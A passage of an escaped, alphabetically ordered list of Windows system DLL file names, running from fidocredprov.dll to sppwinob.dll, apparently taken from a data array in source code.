\"fidocredprov.dll\", \"filemgmt.dll\", \"filterds.dll\", \"findnetprinters.dll\", \"firewallapi.dll\", \"flightsettings.dll\", \"fltlib.dll\", \"fluencyds.dll\", \"fmapi.dll\", \"fmifs.dll\", \"fms.dll\", \"fntcache.dll\", \"fontext.dll\", \"fontprovider.dll\", \"fontsub.dll\", \"fphc.dll\", \"framedyn.dll\", \"framedynos.dll\", \"frameserver.dll\", \"frprov.dll\", \"fsutilext.dll\", \"fthsvc.dll\", \"fundisc.dll\", \"fveapi.dll\", \"fveapibase.dll\", \"fvecerts.dll\", \"fvecpl.dll\", \"fveskybackup.dll\", \"fveui.dll\", \"fvewiz.dll\", \"fwbase.dll\", \"fwcfg.dll\", \"fwmdmcsp.dll\", \"fwpolicyiomgr.dll\", \"fwpuclnt.dll\", \"fwremotesvr.dll\", \"gameinput.dll\", \"gamemode.dll\", \"gamestreamingext.dll\", \"gameux.dll\", \"gamingtcui.dll\", \"gcdef.dll\", \"gdi32.dll\", \"gdi32full.dll\", \"gdiplus.dll\", \"generaltel.dll\", \"geocommon.dll\", \"geolocation.dll\", \"getuname.dll\", \"glmf32.dll\", \"globinputhost.dll\", \"glu32.dll\", \"gmsaclient.dll\", \"gpapi.dll\", \"gpcsewrappercsp.dll\", \"gpedit.dll\", \"gpprefcl.dll\", \"gpprnext.dll\", \"gpscript.dll\", \"gpsvc.dll\", \"gptext.dll\", \"graphicscapture.dll\", \"graphicsperfsvc.dll\", \"groupinghc.dll\", \"hal.dll\", \"halextpl080.dll\", \"hascsp.dll\", \"hashtagds.dll\", \"hbaapi.dll\", \"hcproviders.dll\", \"hdcphandler.dll\", \"heatcore.dll\", \"helppaneproxy.dll\", \"hgcpl.dll\", \"hhsetup.dll\", \"hid.dll\", \"hidcfu.dll\", \"hidserv.dll\", \"hlink.dll\", \"hmkd.dll\", \"hnetcfg.dll\", \"hnetcfgclient.dll\", \"hnetmon.dll\", \"hologramworld.dll\", \"holoshellruntime.dll\", \"holoshextensions.dll\", \"hotplug.dll\", \"hrtfapo.dll\", \"httpapi.dll\", \"httpprxc.dll\", \"httpprxm.dll\", \"httpprxp.dll\", \"httpsdatasource.dll\", \"htui.dll\", \"hvhostsvc.dll\", \"hvloader.dll\", \"hvsigpext.dll\", \"hvsocket.dll\", \"hydrogen.dll\", \"ia2comproxy.dll\", \"ias.dll\", \"iasacct.dll\", \"iasads.dll\", \"iasdatastore.dll\", \"iashlpr.dll\", \"iasmigplugin.dll\", \"iasnap.dll\", \"iaspolcy.dll\", \"iasrad.dll\", \"iasrecst.dll\", \"iassam.dll\", \"iassdo.dll\", \"iassvcs.dll\", \"icfupgd.dll\", \"icm32.dll\", \"icmp.dll\", \"icmui.dll\", \"iconcodecservice.dll\", \"icsigd.dll\", \"icsvc.dll\", \"icsvcext.dll\", \"icu.dll\", \"icuin.dll\", \"icuuc.dll\", \"idctrls.dll\", \"idlisten.dll\", \"idndl.dll\", \"idstore.dll\", \"ieadvpack.dll\", \"ieapfltr.dll\", \"iedkcs32.dll\", \"ieframe.dll\", \"iemigplugin.dll\", \"iepeers.dll\", \"ieproxy.dll\", \"iernonce.dll\", \"iertutil.dll\", \"iesetup.dll\", \"iesysprep.dll\", \"ieui.dll\", \"ifmon.dll\", \"ifsutil.dll\", \"ifsutilx.dll\", \"igddiag.dll\", \"ihds.dll\", \"ikeext.dll\", \"imagehlp.dll\", \"imageres.dll\", \"imagesp1.dll\", \"imapi.dll\", \"imapi2.dll\", \"imapi2fs.dll\", \"imgutil.dll\", \"imm32.dll\", \"implatsetup.dll\", \"indexeddblegacy.dll\", \"inetcomm.dll\", \"inetmib1.dll\", \"inetpp.dll\", \"inetppui.dll\", \"inetres.dll\", \"inked.dll\", \"inkobjcore.dll\", \"inproclogger.dll\", \"input.dll\", \"inputcloudstore.dll\", \"inputcontroller.dll\", \"inputhost.dll\", \"inputservice.dll\", \"inputswitch.dll\", \"inseng.dll\", \"installservice.dll\", \"internetmail.dll\", \"internetmailcsp.dll\", \"invagent.dll\", \"iologmsg.dll\", \"iphlpapi.dll\", \"iphlpsvc.dll\", \"ipnathlp.dll\", \"ipnathlpclient.dll\", \"ippcommon.dll\", \"ippcommonproxy.dll\", \"iprtprio.dll\", \"iprtrmgr.dll\", \"ipsecsnp.dll\", \"ipsecsvc.dll\", \"ipsmsnap.dll\", \"ipxlatcfg.dll\", \"iri.dll\", \"iscsicpl.dll\", \"iscsidsc.dll\", \"iscsied.dll\", \"iscsiexe.dll\", \"iscsilog.dll\", \"iscsium.dll\", \"iscsiwmi.dll\", \"iscsiwmiv2.dll\", \"ism.dll\", \"itircl.dll\", \"itss.dll\", \"iuilp.dll\", \"iumbase.dll\", \"iumcrypt.dll\", \"iumdll.dll\", \"iumsdk.dll\", \"iyuv_32.dll\", \"joinproviderol.dll\", \"joinutil.dll\", \"jpmapcontrol.dll\", \"jpndecoder.dll\", \"jpninputrouter.dll\", \"jpnranker.dll\", \"jpnserviceds.dll\", \"jscript.dll\", \"jscript9.dll\", \"jscript9diag.dll\", \"jsproxy.dll\", \"kbd101.dll\", \"kbd101a.dll\", \"kbd101b.dll\", \"kbd101c.dll\", \"kbd103.dll\", \"kbd106.dll\", \"kbd106n.dll\", \"kbda1.dll\", \"kbda2.dll\", \"kbda3.dll\", \"kbdadlm.dll\", \"kbdal.dll\", \"kbdarme.dll\", \"kbdarmph.dll\", \"kbdarmty.dll\", \"kbdarmw.dll\", \"kbdax2.dll\", \"kbdaze.dll\", \"kbdazel.dll\", \"kbdazst.dll\", \"kbdbash.dll\", \"kbdbe.dll\", \"kbdbene.dll\", \"kbdbgph.dll\", \"kbdbgph1.dll\", \"kbdbhc.dll\", \"kbdblr.dll\", \"kbdbr.dll\", \"kbdbu.dll\", \"kbdbug.dll\", \"kbdbulg.dll\", \"kbdca.dll\", \"kbdcan.dll\", \"kbdcher.dll\", \"kbdcherp.dll\", \"kbdcr.dll\", \"kbdcz.dll\", \"kbdcz1.dll\", \"kbdcz2.dll\", \"kbdda.dll\", \"kbddiv1.dll\", \"kbddiv2.dll\", \"kbddv.dll\", \"kbddzo.dll\", \"kbdes.dll\", \"kbdest.dll\", \"kbdfa.dll\", \"kbdfar.dll\", \"kbdfc.dll\", \"kbdfi.dll\", \"kbdfi1.dll\", \"kbdfo.dll\", \"kbdfr.dll\", \"kbdfthrk.dll\", \"kbdgae.dll\", \"kbdgeo.dll\", \"kbdgeoer.dll\", \"kbdgeome.dll\", \"kbdgeooa.dll\", \"kbdgeoqw.dll\", \"kbdgkl.dll\", \"kbdgn.dll\", \"kbdgr.dll\", \"kbdgr1.dll\", \"kbdgrlnd.dll\", \"kbdgthc.dll\", \"kbdhau.dll\", \"kbdhaw.dll\", \"kbdhe.dll\", \"kbdhe220.dll\", \"kbdhe319.dll\", \"kbdheb.dll\", \"kbdhebl3.dll\", \"kbdhela2.dll\", \"kbdhela3.dll\", \"kbdhept.dll\", \"kbdhu.dll\", \"kbdhu1.dll\", \"kbdibm02.dll\", \"kbdibo.dll\", \"kbdic.dll\", \"kbdinasa.dll\", \"kbdinbe1.dll\", \"kbdinbe2.dll\", \"kbdinben.dll\", \"kbdindev.dll\", \"kbdinen.dll\", \"kbdinguj.dll\", \"kbdinhin.dll\", \"kbdinkan.dll\", \"kbdinmal.dll\", \"kbdinmar.dll\", \"kbdinori.dll\", \"kbdinpun.dll\", \"kbdintam.dll\", \"kbdintel.dll\", \"kbdinuk2.dll\", \"kbdir.dll\", \"kbdit.dll\", \"kbdit142.dll\", \"kbdiulat.dll\", \"kbdjav.dll\", \"kbdjpn.dll\", \"kbdkaz.dll\", \"kbdkhmr.dll\", \"kbdkni.dll\", \"kbdkor.dll\", \"kbdkurd.dll\", \"kbdkyr.dll\", \"kbdla.dll\", \"kbdlao.dll\", \"kbdlisub.dll\", \"kbdlisus.dll\", \"kbdlk41a.dll\", \"kbdlt.dll\", \"kbdlt1.dll\", \"kbdlt2.dll\", \"kbdlv.dll\", \"kbdlv1.dll\", \"kbdlvst.dll\", \"kbdmac.dll\", \"kbdmacst.dll\", \"kbdmaori.dll\", \"kbdmlt47.dll\", \"kbdmlt48.dll\", \"kbdmon.dll\", \"kbdmonmo.dll\", \"kbdmonst.dll\", \"kbdmyan.dll\", \"kbdne.dll\", \"kbdnec.dll\", \"kbdnec95.dll\", \"kbdnecat.dll\", \"kbdnecnt.dll\", \"kbdnepr.dll\", \"kbdnko.dll\", \"kbdno.dll\", \"kbdno1.dll\", \"kbdnso.dll\", \"kbdntl.dll\", \"kbdogham.dll\", \"kbdolch.dll\", \"kbdoldit.dll\", \"kbdosa.dll\", \"kbdosm.dll\", \"kbdpash.dll\", \"kbdphags.dll\", \"kbdpl.dll\", \"kbdpl1.dll\", \"kbdpo.dll\", \"kbdro.dll\", \"kbdropr.dll\", \"kbdrost.dll\", \"kbdru.dll\", \"kbdru1.dll\", \"kbdrum.dll\", \"kbdsf.dll\", \"kbdsg.dll\", \"kbdsl.dll\", \"kbdsl1.dll\", \"kbdsmsfi.dll\", \"kbdsmsno.dll\", \"kbdsn1.dll\", \"kbdsora.dll\", \"kbdsorex.dll\", \"kbdsors1.dll\", \"kbdsorst.dll\", \"kbdsp.dll\", \"kbdsw.dll\", \"kbdsw09.dll\", \"kbdsyr1.dll\", \"kbdsyr2.dll\", \"kbdtaile.dll\", \"kbdtajik.dll\", \"kbdtam99.dll\", \"kbdtat.dll\", \"kbdth0.dll\", \"kbdth1.dll\", \"kbdth2.dll\", \"kbdth3.dll\", \"kbdtifi.dll\", \"kbdtifi2.dll\", \"kbdtiprc.dll\", \"kbdtiprd.dll\", \"kbdtt102.dll\", \"kbdtuf.dll\", \"kbdtuq.dll\", \"kbdturme.dll\", \"kbdtzm.dll\", \"kbdughr.dll\", \"kbdughr1.dll\", \"kbduk.dll\", \"kbdukx.dll\", \"kbdur.dll\", \"kbdur1.dll\", \"kbdurdu.dll\", \"kbdus.dll\", \"kbdusa.dll\", \"kbdusl.dll\", \"kbdusr.dll\", \"kbdusx.dll\", \"kbduzb.dll\", \"kbdvntc.dll\", \"kbdwol.dll\", \"kbdyak.dll\", \"kbdyba.dll\", \"kbdycc.dll\", \"kbdycl.dll\", \"kd.dll\", \"kdcom.dll\", \"kdcpw.dll\", \"kdhvcom.dll\", \"kdnet.dll\", \"kdnet_uart16550.dll\", \"kdscli.dll\", \"kdstub.dll\", \"kdusb.dll\", \"kd_02_10df.dll\", \"kd_02_10ec.dll\", \"kd_02_1137.dll\", \"kd_02_14e4.dll\", \"kd_02_15b3.dll\", \"kd_02_1969.dll\", \"kd_02_19a2.dll\", \"kd_02_1af4.dll\", \"kd_02_8086.dll\", \"kd_07_1415.dll\", \"kd_0c_8086.dll\", \"kerbclientshared.dll\", \"kerberos.dll\", \"kernel32.dll\", \"kernelbase.dll\", \"keycredmgr.dll\", \"keyiso.dll\", \"keymgr.dll\", \"knobscore.dll\", \"knobscsp.dll\", \"ksuser.dll\", \"ktmw32.dll\", \"l2gpstore.dll\", \"l2nacp.dll\", \"l2sechc.dll\", \"laprxy.dll\", \"legacynetux.dll\", \"lfsvc.dll\", \"libcrypto.dll\", \"licensemanager.dll\", \"licensingcsp.dll\", \"licensingdiagspp.dll\", \"licensingwinrt.dll\", \"licmgr10.dll\", \"linkinfo.dll\", \"lltdapi.dll\", \"lltdres.dll\", \"lltdsvc.dll\", \"lmhsvc.dll\", \"loadperf.dll\", \"localsec.dll\", \"localspl.dll\", \"localui.dll\", \"locationapi.dll\", \"lockappbroker.dll\", \"lockcontroller.dll\", \"lockscreendata.dll\", \"loghours.dll\", \"logoncli.dll\", \"logoncontroller.dll\", \"lpasvc.dll\", \"lpk.dll\", \"lsasrv.dll\", \"lscshostpolicy.dll\", \"lsm.dll\", \"lsmproxy.dll\", \"lstelemetry.dll\", \"luainstall.dll\", \"luiapi.dll\", \"lz32.dll\", \"magnification.dll\", \"maintenanceui.dll\", \"manageci.dll\", \"mapconfiguration.dll\", \"mapcontrolcore.dll\", \"mapgeocoder.dll\", \"mapi32.dll\", \"mapistub.dll\", \"maprouter.dll\", \"mapsbtsvc.dll\", \"mapsbtsvcproxy.dll\", \"mapscsp.dll\", \"mapsstore.dll\", \"mapstoasttask.dll\", \"mapsupdatetask.dll\", \"mbaeapi.dll\", \"mbaeapipublic.dll\", \"mbaexmlparser.dll\", \"mbmediamanager.dll\", \"mbsmsapi.dll\", \"mbussdapi.dll\", \"mccsengineshared.dll\", \"mccspal.dll\", \"mciavi32.dll\", \"mcicda.dll\", \"mciqtz32.dll\", \"mciseq.dll\", \"mciwave.dll\", \"mcrecvsrc.dll\", \"mdmcommon.dll\", \"mdmdiagnostics.dll\", \"mdminst.dll\", \"mdmmigrator.dll\", \"mdmregistration.dll\", \"memorydiagnostic.dll\", \"messagingservice.dll\", \"mf.dll\", \"mf3216.dll\", \"mfaacenc.dll\", \"mfasfsrcsnk.dll\", \"mfaudiocnv.dll\", \"mfc42.dll\", \"mfc42u.dll\", \"mfcaptureengine.dll\", \"mfcore.dll\", \"mfcsubs.dll\", \"mfds.dll\", \"mfdvdec.dll\", \"mferror.dll\", \"mfh263enc.dll\", \"mfh264enc.dll\", \"mfksproxy.dll\", \"mfmediaengine.dll\", \"mfmjpegdec.dll\", \"mfmkvsrcsnk.dll\", \"mfmp4srcsnk.dll\", \"mfmpeg2srcsnk.dll\", \"mfnetcore.dll\", \"mfnetsrc.dll\", \"mfperfhelper.dll\", \"mfplat.dll\", \"mfplay.dll\", \"mfps.dll\", \"mfreadwrite.dll\", \"mfsensorgroup.dll\", \"mfsrcsnk.dll\", \"mfsvr.dll\", \"mftranscode.dll\", \"mfvdsp.dll\", \"mfvfw.dll\", \"mfwmaaec.dll\", \"mgmtapi.dll\", \"mi.dll\", \"mibincodec.dll\", \"midimap.dll\", \"migisol.dll\", \"miguiresource.dll\", \"mimefilt.dll\", \"mimofcodec.dll\", \"minstoreevents.dll\", \"miracastinputmgr.dll\", \"miracastreceiver.dll\", \"mirrordrvcompat.dll\", \"mispace.dll\", \"mitigationclient.dll\", \"miutils.dll\", \"mlang.dll\", \"mmcbase.dll\", \"mmcndmgr.dll\", \"mmcshext.dll\", \"mmdevapi.dll\", \"mmgaclient.dll\", \"mmgaproxystub.dll\", \"mmres.dll\", \"mobilenetworking.dll\", \"modemui.dll\", \"modernexecserver.dll\", \"moricons.dll\", \"moshost.dll\", \"moshostclient.dll\", \"moshostcore.dll\", \"mosstorage.dll\", \"mp3dmod.dll\", \"mp43decd.dll\", \"mp4sdecd.dll\", \"mpeval.dll\", \"mpg4decd.dll\", \"mpr.dll\", \"mprapi.dll\", \"mprddm.dll\", \"mprdim.dll\", \"mprext.dll\", \"mprmsg.dll\", \"mpssvc.dll\", \"mpunits.dll\", \"mrmcorer.dll\", \"mrmdeploy.dll\", \"mrmindexer.dll\", \"mrt100.dll\", \"mrt_map.dll\", \"msaatext.dll\", \"msac3enc.dll\", \"msacm32.dll\", \"msafd.dll\", \"msajapi.dll\", \"msalacdecoder.dll\", \"msalacencoder.dll\", \"msamrnbdecoder.dll\", \"msamrnbencoder.dll\", \"msamrnbsink.dll\", \"msamrnbsource.dll\", \"msasn1.dll\", \"msauddecmft.dll\", \"msaudite.dll\", \"msauserext.dll\", \"mscandui.dll\", \"mscat32.dll\", \"msclmd.dll\", \"mscms.dll\", \"mscoree.dll\", \"mscorier.dll\", \"mscories.dll\", \"msctf.dll\", \"msctfmonitor.dll\", \"msctfp.dll\", \"msctfui.dll\", \"msctfuimanager.dll\", \"msdadiag.dll\", \"msdart.dll\", \"msdelta.dll\", \"msdmo.dll\", \"msdrm.dll\", \"msdtckrm.dll\", \"msdtclog.dll\", \"msdtcprx.dll\", \"msdtcspoffln.dll\", \"msdtctm.dll\", \"msdtcuiu.dll\", \"msdtcvsp1res.dll\", \"msfeeds.dll\", \"msfeedsbs.dll\", \"msflacdecoder.dll\", \"msflacencoder.dll\", \"msftedit.dll\", \"msheif.dll\", \"mshtml.dll\", \"mshtmldac.dll\", \"mshtmled.dll\", \"mshtmler.dll\", \"msi.dll\", \"msicofire.dll\", \"msidcrl40.dll\", \"msident.dll\", \"msidle.dll\", \"msidntld.dll\", \"msieftp.dll\", \"msihnd.dll\", \"msiltcfg.dll\", \"msimg32.dll\", \"msimsg.dll\", \"msimtf.dll\", \"msisip.dll\", \"msiso.dll\", \"msiwer.dll\", \"mskeyprotcli.dll\", \"mskeyprotect.dll\", \"msls31.dll\", \"msmpeg2adec.dll\", \"msmpeg2enc.dll\", \"msmpeg2vdec.dll\", \"msobjs.dll\", \"msoert2.dll\", \"msopusdecoder.dll\", \"mspatcha.dll\", \"mspatchc.dll\", \"msphotography.dll\", \"msports.dll\", \"msprivs.dll\", \"msrahc.dll\", \"msrating.dll\", \"msrawimage.dll\", \"msrdc.dll\", \"msrdpwebaccess.dll\", \"msrle32.dll\", \"msscntrs.dll\", \"mssecuser.dll\", \"mssign32.dll\", \"mssip32.dll\", \"mssitlb.dll\", \"mssph.dll\", \"mssprxy.dll\", \"mssrch.dll\", \"mssvp.dll\", \"mstask.dll\", \"mstextprediction.dll\", \"mstscax.dll\", \"msutb.dll\", \"msv1_0.dll\", \"msvcirt.dll\", \"msvcp110_win.dll\", \"msvcp120_clr0400.dll\", \"msvcp140_clr0400.dll\", \"msvcp60.dll\", \"msvcp_win.dll\", \"msvcr100_clr0400.dll\", \"msvcr120_clr0400.dll\", \"msvcrt.dll\", \"msvfw32.dll\", \"msvidc32.dll\", \"msvidctl.dll\", \"msvideodsp.dll\", \"msvp9dec.dll\", \"msvproc.dll\", \"msvpxenc.dll\", \"mswb7.dll\", \"mswebp.dll\", \"mswmdm.dll\", \"mswsock.dll\", \"msxml3.dll\", \"msxml3r.dll\", \"msxml6.dll\", \"msxml6r.dll\", \"msyuv.dll\", \"mtcmodel.dll\", \"mtf.dll\", \"mtfappserviceds.dll\", \"mtfdecoder.dll\", \"mtffuzzyds.dll\", \"mtfserver.dll\", \"mtfspellcheckds.dll\", \"mtxclu.dll\", \"mtxdm.dll\", \"mtxex.dll\", \"mtxoci.dll\", \"muifontsetup.dll\", \"mycomput.dll\", \"mydocs.dll\", \"napcrypt.dll\", \"napinsp.dll\", \"naturalauth.dll\", \"naturallanguage6.dll\", \"navshutdown.dll\", \"ncaapi.dll\", \"ncasvc.dll\", \"ncbservice.dll\", \"ncdautosetup.dll\", \"ncdprop.dll\", \"nci.dll\", \"ncobjapi.dll\", \"ncrypt.dll\", \"ncryptprov.dll\", \"ncryptsslp.dll\", \"ncsi.dll\", \"ncuprov.dll\", \"nddeapi.dll\", \"ndfapi.dll\", \"ndfetw.dll\", \"ndfhcdiscovery.dll\", \"ndishc.dll\", \"ndproxystub.dll\", \"nduprov.dll\", \"negoexts.dll\", \"netapi32.dll\", \"netbios.dll\", \"netcenter.dll\", \"netcfgx.dll\", \"netcorehc.dll\", \"netdiagfx.dll\", \"netdriverinstall.dll\", \"netevent.dll\", \"netfxperf.dll\", \"neth.dll\", \"netid.dll\", \"netiohlp.dll\", \"netjoin.dll\", \"netlogon.dll\", \"netman.dll\", \"netmsg.dll\", \"netplwiz.dll\", \"netprofm.dll\", \"netprofmsvc.dll\", \"netprovfw.dll\", \"netprovisionsp.dll\", \"netsetupapi.dll\", \"netsetupengine.dll\", \"netsetupshim.dll\", \"netsetupsvc.dll\", \"netshell.dll\", \"nettrace.dll\", \"netutils.dll\", \"networkexplorer.dll\", \"networkhelper.dll\", \"networkicon.dll\", \"networkproxycsp.dll\", \"networkstatus.dll\", \"networkuxbroker.dll\", \"newdev.dll\", \"nfcradiomedia.dll\", \"ngccredprov.dll\", \"ngcctnr.dll\", \"ngcctnrsvc.dll\", \"ngcisoctnr.dll\", \"ngckeyenum.dll\", \"ngcksp.dll\", \"ngclocal.dll\", \"ngcpopkeysrv.dll\", \"ngcprocsp.dll\", \"ngcrecovery.dll\", \"ngcsvc.dll\", \"ngctasks.dll\", \"ninput.dll\", \"nlaapi.dll\", \"nlahc.dll\", \"nlasvc.dll\", \"nlhtml.dll\", \"nlmgp.dll\", \"nlmproxy.dll\", \"nlmsprep.dll\", \"nlsbres.dll\", \"nlsdata0000.dll\", \"nlsdata0009.dll\", \"nlsdl.dll\", \"nlslexicons0009.dll\", \"nmadirect.dll\", \"normaliz.dll\", \"npmproxy.dll\", \"npsm.dll\", \"nrpsrv.dll\", \"nshhttp.dll\", \"nshipsec.dll\", \"nshwfp.dll\", \"nsi.dll\", \"nsisvc.dll\", \"ntasn1.dll\", \"ntdll.dll\", \"ntdsapi.dll\", \"ntlanman.dll\", \"ntlanui2.dll\", \"ntlmshared.dll\", \"ntmarta.dll\", \"ntprint.dll\", \"ntshrui.dll\", \"ntvdm64.dll\", \"objsel.dll\", \"occache.dll\", \"ocsetapi.dll\", \"odbc32.dll\", \"odbcbcp.dll\", \"odbcconf.dll\", \"odbccp32.dll\", \"odbccr32.dll\", \"odbccu32.dll\", \"odbcint.dll\", \"odbctrac.dll\", \"oemlicense.dll\", \"offfilt.dll\", \"officecsp.dll\", \"offlinelsa.dll\", \"offlinesam.dll\", \"offreg.dll\", \"ole32.dll\", \"oleacc.dll\", \"oleacchooks.dll\", \"oleaccrc.dll\", \"oleaut32.dll\", \"oledlg.dll\", \"oleprn.dll\", \"omadmagent.dll\", \"omadmapi.dll\", \"onebackuphandler.dll\", \"onex.dll\", \"onexui.dll\", \"opcservices.dll\", \"opengl32.dll\", \"ortcengine.dll\", \"osbaseln.dll\", \"osksupport.dll\", \"osuninst.dll\", \"p2p.dll\", \"p2pgraph.dll\", \"p2pnetsh.dll\", \"p2psvc.dll\", \"packager.dll\", \"panmap.dll\", \"pautoenr.dll\", \"pcacli.dll\", \"pcadm.dll\", \"pcaevts.dll\", \"pcasvc.dll\", \"pcaui.dll\", \"pcpksp.dll\", \"pcsvdevice.dll\", \"pcwum.dll\", \"pcwutl.dll\", \"pdh.dll\", \"pdhui.dll\", \"peerdist.dll\", \"peerdistad.dll\", \"peerdistcleaner.dll\", \"peerdistsh.dll\", \"peerdistsvc.dll\", \"peopleapis.dll\", \"peopleband.dll\", \"perceptiondevice.dll\", \"perfctrs.dll\", \"perfdisk.dll\", \"perfnet.dll\", \"perfos.dll\", \"perfproc.dll\", \"perfts.dll\", \"phoneom.dll\", \"phoneproviders.dll\", \"phoneservice.dll\", \"phoneserviceres.dll\", \"phoneutil.dll\", \"phoneutilres.dll\", \"photowiz.dll\", \"pickerplatform.dll\", \"pid.dll\", \"pidgenx.dll\", \"pifmgr.dll\", \"pimstore.dll\", \"pkeyhelper.dll\", \"pktmonapi.dll\", \"pku2u.dll\", \"pla.dll\", \"playlistfolder.dll\", \"playsndsrv.dll\", \"playtodevice.dll\", \"playtomanager.dll\", \"playtomenu.dll\", \"playtoreceiver.dll\", \"ploptin.dll\", \"pmcsnap.dll\", \"pngfilt.dll\", \"pnidui.dll\", \"pnpclean.dll\", \"pnppolicy.dll\", \"pnpts.dll\", \"pnpui.dll\", \"pnpxassoc.dll\", \"pnpxassocprx.dll\", \"pnrpauto.dll\", \"pnrphc.dll\", \"pnrpnsp.dll\", \"pnrpsvc.dll\", \"policymanager.dll\", \"polstore.dll\", \"posetup.dll\", \"posyncservices.dll\", \"pots.dll\", \"powercpl.dll\", \"powrprof.dll\", \"ppcsnap.dll\", \"prauthproviders.dll\", \"prflbmsg.dll\", \"printui.dll\", \"printwsdahost.dll\", \"prm0009.dll\", \"prncache.dll\", \"prnfldr.dll\", \"prnntfy.dll\", \"prntvpt.dll\", \"profapi.dll\", \"profext.dll\", \"profprov.dll\", \"profsvc.dll\", \"profsvcext.dll\", \"propsys.dll\", \"provcore.dll\", \"provdatastore.dll\", \"provdiagnostics.dll\", \"provengine.dll\", \"provhandlers.dll\", \"provisioningcsp.dll\", \"provmigrate.dll\", \"provops.dll\", \"provplugineng.dll\", \"provsysprep.dll\", \"provthrd.dll\", \"proximitycommon.dll\", \"proximityservice.dll\", \"prvdmofcomp.dll\", \"psapi.dll\", \"pshed.dll\", \"psisdecd.dll\", \"psmsrv.dll\", \"pstask.dll\", \"pstorec.dll\", \"ptpprov.dll\", \"puiapi.dll\", \"puiobj.dll\", \"pushtoinstall.dll\", \"pwlauncher.dll\", \"pwrshplugin.dll\", \"pwsso.dll\", \"qasf.dll\", \"qcap.dll\", \"qdv.dll\", \"qdvd.dll\", \"qedit.dll\", \"qedwipes.dll\", \"qmgr.dll\", \"query.dll\", \"quiethours.dll\", \"qwave.dll\", \"racengn.dll\", \"racpldlg.dll\", \"radardt.dll\", \"radarrs.dll\", \"radcui.dll\", \"rasadhlp.dll\", \"rasapi32.dll\", \"rasauto.dll\", \"raschap.dll\", \"raschapext.dll\", \"rasctrs.dll\", \"rascustom.dll\", \"rasdiag.dll\", \"rasdlg.dll\", \"rasgcw.dll\", \"rasman.dll\", \"rasmans.dll\", \"rasmbmgr.dll\", \"rasmediamanager.dll\", \"rasmm.dll\", \"rasmontr.dll\", \"rasplap.dll\", \"rasppp.dll\", \"rastapi.dll\", \"rastls.dll\", \"rastlsext.dll\", \"rdbui.dll\", \"rdpbase.dll\", \"rdpcfgex.dll\", \"rdpcore.dll\", \"rdpcorets.dll\", \"rdpencom.dll\", \"rdpendp.dll\", \"rdpnano.dll\", \"rdpsaps.dll\", \"rdpserverbase.dll\", \"rdpsharercom.dll\", \"rdpudd.dll\", \"rdpviewerax.dll\", \"rdsappxhelper.dll\", \"rdsdwmdr.dll\", \"rdvvmtransport.dll\", \"rdxservice.dll\", \"rdxtaskfactory.dll\", \"reagent.dll\", \"reagenttask.dll\", \"recovery.dll\", \"regapi.dll\", \"regctrl.dll\", \"regidle.dll\", \"regsvc.dll\", \"reguwpapi.dll\", \"reinfo.dll\", \"remotepg.dll\", \"remotewipecsp.dll\", \"reportingcsp.dll\", \"resampledmo.dll\", \"resbparser.dll\", \"reseteng.dll\", \"resetengine.dll\", \"resetengonline.dll\", \"resourcemapper.dll\", \"resutils.dll\", \"rgb9rast.dll\", \"riched20.dll\", \"riched32.dll\", \"rjvmdmconfig.dll\", \"rmapi.dll\", \"rmclient.dll\", \"rnr20.dll\", \"roamingsecurity.dll\", \"rometadata.dll\", \"rotmgr.dll\", \"rpcepmap.dll\", \"rpchttp.dll\", \"rpcns4.dll\", \"rpcnsh.dll\", \"rpcrt4.dll\", \"rpcrtremote.dll\", \"rpcss.dll\", \"rsaenh.dll\", \"rshx32.dll\", \"rstrtmgr.dll\", \"rtffilt.dll\", \"rtm.dll\", \"rtmediaframe.dll\", \"rtmmvrortc.dll\", \"rtutils.dll\", \"rtworkq.dll\", \"rulebasedds.dll\", \"samcli.dll\", \"samlib.dll\", \"samsrv.dll\", \"sas.dll\", \"sbe.dll\", \"sbeio.dll\", \"sberes.dll\", \"sbservicetrigger.dll\", \"scansetting.dll\", \"scardbi.dll\", \"scarddlg.dll\", \"scardsvr.dll\", \"scavengeui.dll\", \"scdeviceenum.dll\", \"scecli.dll\", \"scesrv.dll\", \"schannel.dll\", \"schedcli.dll\", \"schedsvc.dll\", \"scksp.dll\", \"scripto.dll\", \"scrobj.dll\", \"scrptadm.dll\", \"scrrun.dll\", \"sdcpl.dll\", \"sdds.dll\", \"sdengin2.dll\", \"sdfhost.dll\", \"sdhcinst.dll\", \"sdiageng.dll\", \"sdiagprv.dll\", \"sdiagschd.dll\", \"sdohlp.dll\", \"sdrsvc.dll\", \"sdshext.dll\", \"searchfolder.dll\", \"sechost.dll\", \"seclogon.dll\", \"secproc.dll\", \"secproc_isv.dll\", \"secproc_ssp.dll\", \"secproc_ssp_isv.dll\", \"secur32.dll\", \"security.dll\", \"semgrps.dll\", \"semgrsvc.dll\", \"sendmail.dll\", \"sens.dll\", \"sensapi.dll\", \"sensorsapi.dll\", \"sensorscpl.dll\", \"sensorservice.dll\", \"sensorsnativeapi.dll\", \"sensorsutilsv2.dll\", \"sensrsvc.dll\", \"serialui.dll\", \"servicinguapi.dll\", \"serwvdrv.dll\", \"sessenv.dll\", \"setbcdlocale.dll\", \"settingmonitor.dll\", \"settingsync.dll\", \"settingsynccore.dll\", \"setupapi.dll\", \"setupcl.dll\", \"setupcln.dll\", \"setupetw.dll\", \"sfc.dll\", \"sfc_os.dll\", \"sgrmenclave.dll\", \"shacct.dll\", \"shacctprofile.dll\", \"sharedpccsp.dll\", \"sharedrealitysvc.dll\", \"sharehost.dll\", \"sharemediacpl.dll\", \"shcore.dll\", \"shdocvw.dll\", \"shell32.dll\", \"shellstyle.dll\", \"shfolder.dll\", \"shgina.dll\", \"shimeng.dll\", \"shimgvw.dll\", \"shlwapi.dll\", \"shpafact.dll\", \"shsetup.dll\", \"shsvcs.dll\", \"shunimpl.dll\", \"shutdownext.dll\", \"shutdownux.dll\", \"shwebsvc.dll\", \"signdrv.dll\", \"simauth.dll\", \"simcfg.dll\", \"skci.dll\", \"slc.dll\", \"slcext.dll\", \"slwga.dll\", \"smartscreenps.dll\", \"smbhelperclass.dll\", \"smbwmiv2.dll\", \"smiengine.dll\", \"smphost.dll\", \"smsroutersvc.dll\", \"sndvolsso.dll\", \"snmpapi.dll\", \"socialapis.dll\", \"softkbd.dll\", \"softpub.dll\", \"sortwindows61.dll\", \"sortwindows62.dll\", \"spacebridge.dll\", \"spacecontrol.dll\", \"spatializerapo.dll\", \"spatialstore.dll\", \"spbcd.dll\", \"speechpal.dll\", \"spfileq.dll\", \"spinf.dll\", \"spmpm.dll\", \"spnet.dll\", \"spoolss.dll\", \"spopk.dll\", \"spp.dll\", \"sppc.dll\", \"sppcext.dll\", \"sppcomapi.dll\", \"sppcommdlg.dll\", \"sppinst.dll\", \"sppnp.dll\", \"sppobjs.dll\", \"sppwinob.dll\", 